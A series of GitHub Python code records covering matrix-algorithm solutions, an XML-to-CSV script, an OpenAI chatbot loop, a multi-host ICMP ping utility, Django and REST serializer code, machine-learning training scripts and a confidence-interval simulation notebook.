element must be in the first k rows and k columns.\n\n\"\"\"\n\n# program for the kth smallest element in a 2d array sorted row-wise and column-wise\nfrom sys import maxsize\n\n# A structure to store an entry of the heap. The entry contains a value from the 2D array,\n# plus the row and column numbers of the value\n\nclass HeapNode:\n    def __init__(self, val, r, c):\n        self.val = val  # value to be stored\n        self.r = r  # row number of value in 2D array\n        self.c = c  # column number of value in 2D array\n\n# A utility function to min-heapify the subtree rooted at harr[i] of a heap stored in harr[]\ndef minHeapify(harr, i, heap_size):\n    l = i * 2 + 1\n    r = i * 2 + 2\n    smallest = i\n\n    if l < heap_size and harr[l].val < harr[i].val:\n        smallest = l\n\n    if r < heap_size and harr[r].val < harr[smallest].val:\n        smallest = r\n\n    if smallest != i:\n        harr[i], harr[smallest] = harr[smallest], harr[i]\n        minHeapify(harr, smallest, heap_size)\n\n# This function returns kth smallest element in a 2D array mat[][]\ndef kthSmallest(mat, n, k):\n\n    # k must be greater than 0 and no larger than n*n\n    if k <= 0 or k > n*n:\n        return maxsize\n\n    # create a min heap from the first row of the 2D array; a sorted row is\n    # already a valid min-heap, so no separate build step is needed\n    harr = [0] * n\n\n    for i in range(n):\n        harr[i] = HeapNode(mat[0][i], 0, i)\n\n    hr = HeapNode(0, 0, 0)\n\n    for i in range(k):\n\n        # Get current heap root\n        hr = harr[0]\n\n        # Get next value from the column of the root's value. If the value stored at the root\n        # was the last value in its column, then assign INFINITE as the next value\n        if hr.r < n - 1:\n            nextval = mat[hr.r + 1][hr.c]\n        else:\n            nextval = maxsize\n\n        # update heap root with next value\n        harr[0] = HeapNode(nextval, hr.r + 1, hr.c)\n\n        # heapify root\n        minHeapify(harr, 0, n)\n\n    # Return the value at last extracted root\n    return hr.val\n\nif __name__==\"__main__\":\n    mat = [[10, 20, 30, 40],\n           [15, 25, 35, 45],\n           [25, 29, 37, 48],\n           [32, 33, 39, 50]]\n    print(\"7th smallest element is\", kthSmallest(mat, 4, 7))\n\n\n# expected output: 7th smallest element is 30\n\n\n\"\"\"\nBinary Search over the Range:\n\nThis approach uses binary search to iterate over possible solutions. We know that\n1. answer >= mat[0][0]\n2. 
answer <= mat[N-1][N-1]\n\nSo, we do a binary search on this range and in each iteration determine the number of elements\nless than or equal to our current middle element. For each row this count\ncan be found in O(log(n)) time using binary search.\n\"\"\"\n# This returns the count of elements in the matrix less than or equal to num\ndef getElementsGreaterThanOrEqual(num, n, mat):\n    ans = 0\n    for i in range(n):\n        # if num is less than the first element then no more elements further down in the\n        # matrix are less than or equal to num\n        if(mat[i][0] > num):\n            return ans\n        # if num is greater than the last element, it is greater than all elements in that row\n        if(mat[i][n-1] <= num):\n            ans += n\n            continue\n        # This holds the col index of the last element in the row less than or equal to num\n        greaterThan = 0\n        jump = n // 2\n        while(jump >= 1):\n            while(greaterThan + jump < n and mat[i][greaterThan + jump] <= num):\n                greaterThan += jump\n            jump //= 2\n\n        ans += greaterThan + 1\n    return ans\n\n# returns the kth smallest element in the matrix\ndef kthSmallest(mat, n, k):\n    # We know the answer lies between the first and the last element, so do a binary search\n    # on the answer, guided by how many elements in the matrix are <= the current candidate\n    l, r = mat[0][0], mat[n-1][n-1]\n\n    while(l <= r):\n        mid = l + (r - l) // 2\n        greaterThanOrEqualMid = getElementsGreaterThanOrEqual(mid, n, mat)\n        if(greaterThanOrEqualMid >= k):\n            r = mid - 1\n        else:\n            l = mid + 1\n    return l\n\n\nn = 4\nmat = [[10, 20, 30, 40],[15, 25, 35, 45],[25, 29, 37, 48],[32, 33, 39, 50]]\nprint(f\"7th smallest element is {kthSmallest(mat, 4, 7)}\")\n\n\"\"\"\nComplexity Analysis\n\nTime Complexity: O(y * n*logn)\nwhere y = log( abs(Mat[0][0] - Mat[n-1][n-1]) ).\nWe call the getElementsGreaterThanOrEqual function log( abs(Mat[0][0] - Mat[n-1][n-1]) ) times;\nits time complexity is O(n logn) since we do a binary search in each of the n rows.\n\nSpace Complexity: O(1)\n\nUSING ARRAY:\n------------\nCopy all the contents of the matrix into a new array, sort that array, and take its\n(k-1)th entry. This is the simplest approach, at the cost of O(n^2 log n) time and O(n^2) space.\n\"\"\"\n\ndef kth_smallest_arr(mat, n, k):\n\n    a = [0 for i in range(n*n)]\n    v = 0\n\n    for i in range(n):\n        for j in range(n):\n            a[v] = mat[i][j]\n            v += 1\n\n    a.sort()\n    result = a[k - 1]\n    return result\n\nmat = [ [ 10, 20, 30, 40 ],\n        [ 15, 25, 35, 45 ],\n        [ 25, 29, 37, 48 ],\n        [ 32, 33, 39, 50 ] \n        ]\n\nres = kth_smallest_arr(mat, 4, 7)\n\nprint(\"7th smallest element is \" + str(res))","repo_name":"Chemokoren/Algorithms-1","sub_path":"GFG/Arrays/OrderStatistics/kth_smallest_element_in_row_wise_and_column_wise_sorted_2D_array_set.py","file_name":"kth_smallest_element_in_row_wise_and_column_wise_sorted_2D_array_set.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"14098637839","text":"import xml.etree.ElementTree as ET\nimport csv\ntree = ET.parse(r\"d:\\My project\\BlogApp\\BlogApp\\fedility_service\\sample.xml\")\nprint(\"----------------------------\")\nroot = tree.getroot()\nprint(\"...................\",root)\n \nResident_data = open(r'd:\\My project\\BlogApp\\BlogApp\\fedility_service\\output.csv', 'w')\n \ncsvwriter = csv.writer(Resident_data)\nresident_head = []\ncount = 0\nfor member in root.find('ReportData'):\n    print(member)\n    csvwriter.writerow([member.text, \"empty\"])\n    
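    # (comment added) each output row is the element's text plus a literal "empty" placeholder column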
\nResident_data.close()\n\n\n\n","repo_name":"Chinjumerinamonachan/BlogApp","sub_path":"fedility_service/xml_csv_conversion.py","file_name":"xml_csv_conversion.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36707159851","text":"import openai\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\n\ndef get_bot_response(message):\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=message,\n temperature=0.5,\n max_tokens=60,\n top_p=1.0,\n frequency_penalty=0.5,\n presence_penalty=0.0,\n stop=[\"You:\"]\n )\n # return the text of the completion\n return response.choices[0].text.strip()\n\n\ndef chat_loop():\n print(\"Hal: Hello! How can I assist you today?\")\n\n while True:\n user_message = input(\"You: \")\n if user_message.lower() in [\"quit\", \"bye\", \"goodbye\", \"see you\"]:\n print(\"Hal: Goodbye!\")\n break\n else:\n bot_response = get_bot_response(user_message)\n print(f\"Hal: {bot_response}\")\n\n\nif __name__ == \"__main__\":\n chat_loop()\n","repo_name":"kamephis/deeptalk","sub_path":"deeptalk.py","file_name":"deeptalk.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"44781278338","text":"import socket\nimport struct\nimport argparse\nimport time\nimport threading\n\nICMP_ECHO_REQUEST = 8\n\ndef calculate_checksum(packet):\n checksum = 0\n for i in range(0, len(packet), 2):\n checksum += (packet[i] << 8) + packet[i + 1]\n checksum = (checksum >> 16) + (checksum & 0xFFFF)\n return ~checksum & 0xFFFF\n\ndef send_ping_request(dest_ip):\n icmp_checksum = 0\n icmp_id = 1 \n icmp_seq = 1\n\n icmp_header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, icmp_checksum, icmp_id, icmp_seq)\n data = b\"abcdefghijklmnopqrstuvwabcdefghi\"\n\n\n icmp_checksum = calculate_checksum(icmp_header + data)\n icmp_header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(icmp_checksum), icmp_id, icmp_seq)\n\n try:\n \n raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n raw_socket.sendto(icmp_header + data, (dest_ip, 0))\n \n # ICMP yanıtını al\n recv_packet, addr = raw_socket.recvfrom(1024)\n round_trip_time = (time.time() - start_time) * 1000\n return round_trip_time, addr[0]\n except socket.timeout:\n return None, None\n\ndef ping_host(host, timeout):\n global start_time\n start_time = time.time()\n try:\n dest_ip = socket.gethostbyname(host)\n while not stop_event.is_set():\n response_time, dns_ip = send_ping_request(dest_ip)\n if response_time is not None:\n if dns_ip:\n print(f\"{host} ({dns_ip}) Ping successfully sent to the address. Ping time: {response_time} ms\")\n else:\n print(f\"{host} Ping successfully sent to the address. 
Ping time: {response_time} ms\")\n else:\n print(f\"{host} An error occurred while pinging the address.\")\n time.sleep(1)\n except Exception as e:\n print(f\"{host} An error occurred while pinging the address: {str(e)}\")\n\ndef ping_hosts_from_file(file_path, timeout):\n try:\n with open(file_path, \"r\") as file:\n targets = file.read().splitlines()\n except FileNotFoundError:\n print(f\"{file_path} File not found.\")\n return\n except Exception as e:\n print(f\"An error occurred while opening the file: {str(e)}\")\n return\n\n for target in targets:\n ping_thread = threading.Thread(target=ping_host, args=(target, timeout))\n ping_thread.start()\n\ndef main():\n global stop_event\n stop_event = threading.Event()\n\n parser = argparse.ArgumentParser(description=\"Tool used for ICMP ping to IP addresses.\")\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-u\", \"--url\", help=\"Pings an IP or domain address\", type=str)\n group.add_argument(\"-l\", \"--list\", help=\"Pings IP or domain addresses from a file\", type=str)\n parser.add_argument(\"-t\", \"--timeout\", help=\"Maximum timeout for ping responses (seconds)\", type=float, default=2)\n try:\n args = parser.parse_args()\n except KeyboardInterrupt:\n stop_event.set()\n return\n\n if args.url:\n ping_host(args.url, args.timeout)\n\n if args.list:\n ping_hosts_from_file(args.list, args.timeout)\n\n try:\n while not stop_event.is_set():\n pass\n except KeyboardInterrupt:\n stop_event.set()\n\nif __name__ == \"__main__\":\n main()","repo_name":"sefabasnak/MULTIPLE-PING","sub_path":"multiple-ping.py","file_name":"multiple-ping.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72503382832","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Apr 13、4\n\n@author: xiaoheizai\n\"\"\"\n\n'''\n给定一个二维的矩阵,包含 'X' 和 'O'(字母 O)。\n\n找到所有被 'X' 围绕的区域,并将这些区域里所有的 'O' 用 'X' 填充。\n\n示例:\n\nX X X X\nX O O X\nX X O X\nX O X X\n运行你的函数后,矩阵变为:\n\nX X X X\nX X X X\nX X X X\nX O X X\n解释:\n\n被围绕的区间不会存在于边界上,换句话说,任何边界上的 'O' 都不会被填充为 'X'。 \n任何不在边界上,或不与边界上的 'O' 相连的 'O' 最终都会被填充为 'X'。\n如果两个元素在水平或垂直方向相邻,则称它们是“相连”的。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/surrounded-regions\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\n\nclass UnionFind(object):\n def __init__(self, n):\n self.uf = [-1 for i in range(n)]\n \n def find(self, node):\n temp = node\n while self.uf[node] > 0:\n node = self.uf[node]\n \n while self.uf[temp] > 0:\n self.uf[temp], temp = node, self.uf[temp]\n \n return node\n \n def union(self, node1, node2):\n root1 = self.find(node1)\n root2 = self.find(node2)\n \n if root1 == root2:\n return\n if self.uf[root1] < self.uf[root2]:\n self.uf[root1] += self.uf[root2]\n self.uf[root2] = root1\n else:\n self.uf[root2] += self.uf[root1]\n self.uf[root1] = root2\n \n def is_connect(self, node1, node2):\n return self.find(node1) == self.find(node2)\n\nclass Solution(object):\n def solve(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: None Do not return anything, modify board in-place instead.\n \"\"\"\n row = len(board)\n if row == 0:\n return board\n col = len(board[0])\n union_table = UnionFind(row * col + 1)\n virtual_node = row * col\n \n for i in range(row):\n for j in range(col):\n index = i * col + j\n if i == 0 or j == 0 or i == row -1 or j == col - 1:\n if board[i][j] == \"O\":\n union_table.union(index, virtual_node)\n if board[i][j] == \"O\":\n if i < row - 1 and board[i+1][j] == \"O\":\n 
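                        # (comment added) cells are flattened row-major (index = i * col + j);
                        # union this 'O' with the 'O' directly below it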
index_down = (i+1) * col + j\n union_table.union(index, index_down)\n if j < col - 1 and board[i][j+1] == \"O\":\n index_right = index + 1\n union_table.union(index, index_right)\n \n for i in range(row):\n for j in range(col):\n index = i * col + j\n if i == 0 or j ==0 or i == row - 1 or j == col - 1:\n continue\n else:\n if not union_table.is_connect(index, virtual_node):\n board[i][j] = \"X\"","repo_name":"xiaoheizai/python_for_leetcode","sub_path":"并查集/130 被围绕的区域.py","file_name":"130 被围绕的区域.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"35589093729","text":"# This module receives and processes the bar data\n# First draft 2016/10/3\n# This draft 2016/10/6\n\n\nimport pandas as pd\nimport datetime\n\n\n# The sample data is a stock in HS300 taken randomly from Tushare \nclass DataHandler2(object):\n\n def __init__(self, path):\n self.path = path\n self.data = pd.read_csv(self.path)\n self.data.returni = []\n for i in range(1, len(self.data)):\n self.data.returni.append(\n (self.data.close[i] - self.data.close[i - 1]) / self.data.close[i - 1])\n","repo_name":"FreeA7/financial_kmeans","sub_path":"Problem2_10_03/datahandler2.py","file_name":"datahandler2.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20771798845","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ktapp', '0010_film_directors_cache'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MessageCountCache',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('number_of_messages', models.PositiveIntegerField(default=0)),\n ('owned_by', models.ForeignKey(related_name='owned_message_count', to=settings.AUTH_USER_MODEL)),\n ('partner', models.ForeignKey(related_name='partner_message_count', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='messagecountcache',\n unique_together=set([('owned_by', 'partner')]),\n ),\n migrations.AddField(\n model_name='ktuser',\n name='number_of_messages',\n field=models.PositiveIntegerField(default=0),\n preserve_default=True,\n ),\n ]\n","repo_name":"cu2/KT","sub_path":"ktapp/migrations/0011_auto_20150902_1833.py","file_name":"0011_auto_20150902_1833.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"38"} +{"seq_id":"12647321031","text":"from hpsklearn import HyperoptEstimator, any_sparse_classifier, tfidf,liblinear_svc\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn import metrics\nfrom hyperopt import tpe\nimport numpy as np\nfrom sklearn.metrics import accuracy_score,classification_report\n# Download the data and split into training and test sets\n\nimport pandas as pd, numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer,HashingVectorizer\nfrom sklearn import svm\nimport logging\nimport numpy as np\nimport time\nimport os\nimport pickle # pickle模块2\nimport logging\nimport os\nimport sys\nimport json\nimport datetime\nfrom collections import defaultdict\n\ncurrentUrl = os.path.dirname(__file__)\nmost_parenturl = 
os.path.abspath(os.path.join(currentUrl, os.pardir))\nm_p, m_c = os.path.split(most_parenturl)\nwhile 'xunfei' not in m_c:\n m_p, m_c = os.path.split(m_p)\n\nsys.path.append(os.path.join(m_p, m_c))\nfrom class_model.load_data import load_data\nfrom sklearn.metrics import accuracy_score\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')\n# 1281312322\ncolumn = \"word_seg\"\nproject_path=\"/data/tanggp/xun_class//aichallenge/\"\ntest_path=os.path.join(project_path,\"apptype_train.test_jieba_json\")\ntrain_path=os.path.join(project_path,\"apptype_train.train_jieba_json\")\npred_path=os.path.join(project_path,\"app_desc.jieba_json\")\nlabel_dic = {}\nlabel_num = 0\nt = time.time()\n\nimport json\n\nfrom sklearn.calibration import CalibratedClassifierCV\n\ndef get_data_set(flie):\n global label_num\n with open(flie) as f:\n lines = f.readlines()\n data_x = []\n data_y = []\n apps=[]\n for li in lines:\n li=json.loads(li)\n text=li.get(\"jieba\")\n label1=li.get(\"label\",\"no\") #label_1st\n app=li.get(\"app\")\n apps.append(app)\n if label1 not in label_dic.keys():\n label_dic[label1] = label_num\n label_num += 1\n\n label = label_dic.get(label1)\n\n data_x.append(text)\n data_y.append(label)\n assert len(data_x) == len(data_y)\n return data_x, np.array(data_y).astype(int),apps\n\n\ndef svm_train():\n # train_x, train_y,apps = get_data_set(train_path)\n # test_x, test_y,apps = get_data_set(test_path)\n # pred_x,_,apps=get_data_set(pred_path)\n train_x, train_y, test_x, test_y, pred_x, apps, label_dic = load_data()\n # with open(CHANNEL_MODEL + 'svm_label.pkl', 'wb') as f:\n # pickle.dump(label_dic, f)\n\n logging.info('train {} test{}'.format(len(train_x), len(test_x)))\n t=time.time()\n logging.info(\"===\"*8)\n\n estim = HyperoptEstimator(classifier=liblinear_svc('clf'),max_evals=10,\n preprocessing=[\n tfidf('tfidf',ngram_range=(1, 4), min_df=10, max_df=0.9, use_idf=1, smooth_idf=1, sublinear_tf=1)],\n algo=tpe.suggest, trial_timeout=1200,refit=False)\n logging.info(estim)\n estim.fit(train_x, train_y)\n best_model=estim.best_model()\n\n logging.info(best_model)\n learner=best_model['learner']\n preprocs=best_model['preprocs'][0]\n\n lin_clf = learner\n lin_clf = CalibratedClassifierCV(lin_clf)\n data_set=train_x+test_x+pred_x\n preprocs.fit_transform(data_set)\n trn_term_doc=preprocs.transform(train_x)\n lin_clf.fit(trn_term_doc, train_y)\n\n test_term_doc = preprocs.transform(test_x)\n test_preds_prob = lin_clf.predict_proba(test_term_doc)\n test_preds_=lin_clf.predict(test_term_doc)\n logging.info('accuracy_score {} top1 test\\n {}'.format(accuracy_score(test_y, test_preds_),\n classification_report(test_y,\n test_preds_)))\n test_preds=[]\n for prob in test_preds_prob:\n test_preds.append(list(prob.argsort()[-2:][::-1]))\n\n test_preds_ = []\n for rea, tes in zip(test_y, test_preds):\n prd = tes[0]\n for te in tes:\n if rea == te:\n prd = te\n test_preds_.append(prd)\n logging.info('accuracy_score {} top2 test\\n {}'.format(accuracy_score(test_y, test_preds_),\n classification_report(test_y,\n test_preds_)))\n\n\n #logging.info(estim.fit().score(test_x, test_y))\n # <>\n #logging.info(estim.best_model())\n # <>\n\n\n\ndef svm_pred():\n logging.info('pred')\n test_x, test_y = get_data_set(pred_path)\n with open(project_path + 'tfidf.pkl', 'rb') as f:\n vec = pickle.load(f)\n\n test_term_doc = vec.transform(test_x)\n\n with open(project_path + 'svm_model.pkl', 'rb') as f:\n lin_clf = pickle.load(f)\n\n test_preds = 
lin_clf.predict(test_term_doc)\n\n from sklearn.metrics import confusion_matrix, classification_report\n\n logging.info('\\n {}'.format(classification_report(test_y, test_preds)))\n\nif __name__ == \"__main__\":\n svm_train()\n #svm_pred()\n\n","repo_name":"godkillok/xunfei","sub_path":"class_model/hyper.py","file_name":"hyper.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20162960457","text":"from rest_framework import serializers\n\nfrom loads.models import Load, LoadTruck, Location, Truck\n\n\nclass TruckSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for update Truck.\"\"\"\n location = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n\n class Meta:\n model = Truck\n fields = ('id', 'uid', 'location', 'capacity')\n read_only_fields = ('uid', 'capacity')\n\n\nclass LoadUpdateSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for update Load.\"\"\"\n pick_up = serializers.SlugRelatedField(\n read_only=True,\n slug_field='zip',\n )\n delivery = serializers.SlugRelatedField(\n read_only=True,\n slug_field='zip',\n )\n\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'weight', 'description')\n\n\nclass LoadBaseSerializer(serializers.ModelSerializer):\n \"\"\"Base serializer for load.\"\"\"\n pick_up = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n delivery = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n\n\nclass LoadCreateSerializer(LoadBaseSerializer):\n \"\"\"Serializer for create Load.\"\"\"\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'weight', 'description')\n\n\nclass LoadListSerializer(LoadBaseSerializer):\n \"\"\"Serializer for list view of Load.\"\"\"\n near_trucks = serializers.IntegerField()\n\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'near_trucks')\n\n\nclass TruckDistanceSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for truck - distance.\"\"\"\n truck = serializers.SlugRelatedField(\n slug_field='uid',\n read_only=True\n )\n\n class Meta:\n fields = ('truck', 'distance')\n model = LoadTruck\n\n\nclass LoadRetrieveSerializer(LoadBaseSerializer):\n \"\"\"Serializer for retrieve Load.\"\"\"\n trucks = TruckDistanceSerializer(many=True)\n\n class Meta:\n model = Load\n fields = (\n 'id', 'pick_up', 'delivery', 'weight', 'description', 'trucks'\n )\n","repo_name":"KuzenkovAG/truck_service","sub_path":"truck_service/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22482281238","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# =============================================================================\n# Imports & Function definitions\n# =============================================================================\nfrom dotter.models import DotterModel\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# =============================================================================\n# Parameters\n# =============================================================================\n\ndef test_vegetation():\n \"\"\"\n testcase with vegetation growth\n \"\"\"\n deltabeek = DotterModel('tests/testcases/vegetation/config.ini')\n deltabeek.run()\n\ndef test_backwater():\n \"\"\"\n Tests 
whether the numerical approximation tends to the equilibrium\n \"\"\"\n deltabeek = DotterModel('tests/testcases/backwater/config.ini')\n\n # The accuracy of the numerical resolution depends on the h_resolution\n deltabeek.grid.h_resolution = 50\n deltabeek.grid.max_depth = 5\n deltabeek.grid.generate_grid()\n\n # Equilibrium depth\n depth = 1.568138\n\n # Check whether above depth is equilibrium\n h = deltabeek.grid.bedlevel[0] + depth\n A = deltabeek.grid.wet_area[0](h)\n R = deltabeek.grid.hydraulic_radius[0](h)\n i = deltabeek.grid.bedslope[0]\n C = R ** (1 / 6.) / 0.04\n\n assert(np.abs(3.50 - A * C * np.sqrt(R * i)) < 0.001)\n\n deltabeek.run(timesteps=[deltabeek.grid.time[0]])\n error = np.abs(deltabeek.output.waterdepth[0][0] - depth)\n assert (error < 0.001)\n","repo_name":"kdberends/dotter","sub_path":"tests/test_hydraulics.py","file_name":"test_hydraulics.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9712132913","text":"import sys\nimport json\nfrom model import SalesPredictionLSTM\nfrom data_utils import load_timeseries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ntrain_file = \"data/sales.csv\"\nwindow_size = 6\ntrain_test_split = 0.8\n(\n x_train, y_train, x_test, y_test,\n x_test_raw, y_test_raw,\n last_window_raw, last_window\n) = load_timeseries(train_file, window_size, train_test_split)\n\nmodel = SalesPredictionLSTM(\n layers=[window_size, 100, 100, 1],\n dropout=0.2,\n batch_size=100,\n epochs=100,\n validation_split=0.1\n)\n\nmodel.build_model()\n\nmodel.train(x_train, y_train)\nmodel.save_weights('weights.h5')\n","repo_name":"sushantMoon/isi-nna","sub_path":"assignment7/server-train.py","file_name":"server-train.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"29556550837","text":"# This is the first cell with code: set up the Python environment\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nimport scipy as sp\nimport scipy.stats\nfrom scipy.stats import binom\nimport pandas as pd\nfrom ipywidgets import interact, interactive, fixed\nimport ipywidgets as widgets\nfrom IPython.display import clear_output, display, HTML\n\ndef binoLowerCL(n, x, cl = 0.975, inc=0.000001, p = None):\n \"Lower confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = float(x)/float(n)\n lo = 0.0\n if (x > 0):\n f = lambda q: cl - scipy.stats.binom.cdf(x-1, n, q)\n lo = sp.optimize.brentq(f, 0.0, p, xtol=inc)\n return lo\n\ndef binoUpperCL(n, x, cl = 0.975, inc=0.000001, p = None):\n \"Upper confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = float(x)/float(n)\n hi = 1.0\n if (x < n):\n f = lambda q: scipy.stats.binom.cdf(x, n, q) - (1-cl)\n hi = sp.optimize.brentq(f, p, 1.0, xtol=inc) \n return hi\n\n# Population of two values, {0, 1}, in various proportions. 
Amounts to Binomial random variable\nns = np.array([25, 50, 100, 400]) # sample sizes\nps = np.array([.001, .01, 0.1]) # mixture fractions, proportion of 1s in the population\nalpha = 0.05 # 1- (confidence level)\nreps = int(1.0e3) # just for demonstration\nvals = [0, 1]\n\nsimTable = pd.DataFrame(columns=('fraction of 1s', 'sample size', 'Student-t cov', 'Binom cov', 'Student-t len', 'Binom len'))\nfor p in ps:\n popMean = p\n for n in ns:\n tCrit = sp.stats.t.ppf(q=1.0-alpha/2, df=n-1)\n samMean = np.zeros(reps)\n sam = sp.stats.binom.rvs(n, p, size=reps)\n samMean = sam/float(n)\n samSD = np.sqrt(samMean*(1-samMean)/(n-1))\n coverT = (np.fabs(samMean-popMean) < tCrit*samSD).sum()\n aveLenT = 2*(tCrit*samSD).mean()\n coverB = 0\n totLenB = 0.0\n for r in range(int(reps)): \n lo = binoLowerCL(n, sam[r], cl=1.0-alpha/2)\n hi = binoUpperCL(n, sam[r], cl=1.0-alpha/2)\n coverB += ( p >= lo) & (p <= hi)\n totLenB += hi-lo\n simTable.loc[len(simTable)] = p, n, str(100*float(coverT)/float(reps)) + '%', str(100*float(coverB)/float(reps)) + '%', str(round(aveLenT,4)), str(round(totLenB/float(reps),4))\n#\nansStr = '
Simulated coverage probability and expected length of Student-t and Binomial confidence intervals for a {0, 1} population. ' + 'Nominal coverage probability ' + str(100*(1-alpha)) + '%.
Estimated from ' + str(int(reps)) + ' replications.'\ndisplay(HTML(ansStr))\ndisplay(simTable)\n\n# Nonstandard mixture: a pointmass at zero and a uniform[0,1]\nns = np.array([25, 50, 100, 400]) # sample sizes\nps = np.array([0.9, 0.99, 0.999]) # mixture fraction, weight of pointmass\nthresh = [0.2, 0.1, 0.01, .001]\nalpha = 0.05 # 1- (confidence level)\nreps = 1.0e3 # just for demonstration\n\ncols = ['mass at 0', 'sample size', 'Student-t cov']\nfor i in range(len(thresh)):\n cols.append('Bin t=' + str(thresh[i]) + ' cov')\ncols.append('Student-t len')\nfor i in range(len(thresh)):\n cols.append('Bin t=' + str(thresh[i]) + ' len')\n\n\nsimTable = pd.DataFrame(columns=cols)\n\nfor p in ps:\n popMean = (1-p)*0.5 # p*0 + (1-p)*.5\n for n in ns:\n tCrit = sp.stats.t.ppf(q=1-alpha, df=n-1)\n coverT = 0 # coverage of t intervals\n tUp = 0 # mean upper bound of t intervals\n coverB = np.zeros(len(thresh)) # coverage of binomial threshold intervals\n bUp = np.zeros(len(thresh)) # mean upper bound of binomial threshold intervals\n for rep in range(int(reps)):\n sam = np.random.uniform(size=n)\n ptMass = np.random.uniform(size=n)\n sam[ptMass < p] = 0.0\n samMean = np.mean(sam)\n samSD = np.std(sam, ddof=1)\n tlim = samMean + tCrit*samSD\n coverT += (popMean <= tlim) # one-sided Student-t\n tUp += tlim\n for i in range(len(thresh)):\n x = (sam > thresh[i]).sum() # number of binomial \"successes\"\n pPlus = binoUpperCL(n, x, cl=1-alpha)\n blim = thresh[i]*(1.0-pPlus) + pPlus\n coverB[i] += (popMean <= blim)\n bUp[i] += blim\n theRow = [p, n, str(100*float(coverT)/float(reps)) + '%']\n for i in range(len(thresh)):\n theRow.append(str(100*float(coverB[i])/float(reps)) + '%')\n theRow.append(str(round(tUp/float(reps), 3)))\n for i in range(len(thresh)):\n theRow.append(str(round(bUp[i]/float(reps), 3)))\n simTable.loc[len(simTable)] = theRow\n#\nansStr = '
Simulated coverage probability and expected lengths of one-sided Student-t confidence intervals and threshold ' + 'Binomial intervals for mixture of U[0,1] and pointmass at 0. ' + 'Nominal coverage probability ' + str(100*(1-alpha)) + '%.
